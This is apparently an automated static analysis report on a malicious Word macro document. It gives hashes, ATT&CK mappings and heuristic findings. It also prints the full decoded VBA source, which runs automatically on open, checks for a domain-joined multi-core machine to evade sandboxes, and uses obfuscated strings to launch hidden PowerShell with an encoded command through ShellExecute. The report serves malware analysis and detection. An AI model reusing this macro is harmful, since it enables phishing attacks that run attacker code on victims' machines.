Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a4e598cf56846441…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 111.5 KB
Created: 2017-11-15 14:02:00
Authoring application: Microsoft Office Word
First seen: 2017-11-20
MD5: 3001edc918da564e7d80ec3075275664
SHA-1: 2558dcfccc6ff9071c6611989b3eebbb8e600e28
SHA-256: a4e598cf568464418e1cbbac885ff3f3e3019cbfeb2cfd1602238d817ee131f5
Risk Score: 158

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The file contains a VBA macro that is automatically executed upon opening, as indicated by the 'Document_Open' subroutine and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. This macro utilizes the ShellExecute API to run external commands, a common technique for downloading and executing further malicious payloads. The presence of 'CreateObject' and 'Environ' calls suggests potential interaction with the system environment to facilitate this execution.

Heuristics (7)

  • Reference to ShellExecute API (high) SC_STR_SHELLEXEC
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    Matched line in script:
        fsObj = "Scrip" & "ting" & Chr(46) & "FileSy" & "stemObject"
        If (CreateObject(fsObj).FolderExists(strfldr)) Then RptFldrStat = True Else RptFldrStat = False
    End Function
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Matched line in script:
    Private Sub Document_Open()
        If DNameCheck And NumOfCores Then
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
    Matched line in script:
    Private Function DNameCheck() As Boolean
        DName = Environ("USERDNSDOMAIN")
        If DName = "" Then DNameCheck = False Else DNameCheck = True
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the URLs below were found in document text (OLE body), none in the macro code. The schemas.openxmlformats.org entries are XML namespace identifiers, and the digicert.com entries are OCSP, CRL and CPS pointers of the kind carried in certificate extensions; neither group is an address the macro contacts.
    • http://ocsp.digicert.com (2 occurrences)
    • http://schemas.openxmlformats.org/office (truncated in extraction)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml
    • http://schemas.openxmlformats.org/drawingml/2006/main
    • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
    • http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl
    • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
    • https://www.digicert.com/CPS
    • http://crl3.digicert.com/sha2-assured-cs-g1.crl
    • http://crl4.digicert.com/sha2-assured-cs-g1.crl
    • http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3515 bytes
SHA-256: dacf3f37e9babd518a4860d3f15d194a1d768234920ccbfb9188e436a038fb98

Extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
    Private Declare PtrSafe Function EoC Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, _
        ByVal lpFile As String, _
        ByVal lpParameters As String, _
        ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
#Else
    Private Declare Function EoC Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, _
        ByVal lpFile As String, _
        ByVal lpParameters As String, _
        ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
#End If

Public in1Line As String
Public strfldr As String
Public strVVV As String
Public strExt As String
Public DName As String

Private Sub Document_Open()
    If DNameCheck And NumOfCores Then
        in1Line = ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text: _
        Enc_Change: _
        RptFldrStat: _
        Memorandum
    End If
End Sub

Private Function Enc_Change()
    Dim strAlpha As String
    Dim strPoWP
    
    strAlpha = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    strPoWP = "SysWOW64" & Chr(92) & Left(Mid(strAlpha, 23), 1) & "indo" & Left(Mid(strAlpha, 23), 1) & "s" & Chr(92) & Left(Mid(strAlpha, 29), 1) & ":"

    strVVV = Left(Mid(strAlpha, 16), 1) & Left(Mid(strAlpha, 15), 1) & Left(Mid(strAlpha, 23), 1) & Left(Mid(strAlpha, 5), 1) & _
    Left(Mid(strAlpha, 18), 1) & Left(Mid(strAlpha, 19), 1) & Left(Mid(strAlpha, 8), 1) & Left(Mid(strAlpha, 5), 1) & Left(Mid(strAlpha, 12), 1) & Left(Mid(strAlpha, 12), 1)
    strExt = "." + Chr(CStr(Asc(Mid$(strAlpha, 5, 1)))) + Chr(CStr(Asc(Mid$(strAlpha, 24, 1)))) + Chr(CStr(Asc(Mid$(strAlpha, 5, 1))))
    strPoWP = Split(strPoWP, "\"): strfldr = strPoWP(2) & Chr(92) & strPoWP(1) & Chr(92) & strPoWP(0)
End Function

Private Function RptFldrStat() As Boolean
    Dim fsObj As String
    fsObj = "Scrip" & "ting" & Chr(46) & "FileSy" & "stemObject"
    If (CreateObject(fsObj).FolderExists(strfldr)) Then RptFldrStat = True Else RptFldrStat = False
End Function

Private Function Memorandum() As Variant
    Dim strProgramName As String
    Dim strArgument As String
    If RptFldrStat = True Then strProgramName = strfldr & "\Windows" & strVVV & "\v1.0\" & strVVV & strExt Else strProgramName = strVVV & strExt
    strArgument = " -" & Chr(101) & Chr(112) & " " & Chr(98) & Chr(121) & Chr(112) & Chr(97) & Chr(115) & Chr(115) & " -" & Chr(110) & Chr(111) & Chr(112) & " -" & Chr(110) & Chr(111) & Chr(101) & Chr(120) & Chr(105) & Chr(116) & " -" & "enc " & """" & in1Line & """"
    EoC 0&, vbNullString, strProgramName, strArgument, "", 0
End Function

Private Function DNameCheck() As Boolean
    DName = Environ("USERDNSDOMAIN")
    If DName = "" Then DNameCheck = False Else DNameCheck = True
End Function

Function NumOfCores() As Boolean
    Dim strRegKey As String
    On Error Resume Next
    strRegKey = CreateObject("W" + "S" + "cript" + Chr(46) + "Sh" + Chr(101) + "ll").RegRead("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString")

    If Err Then NumOfCores = False Else NumOfCores = True
End Function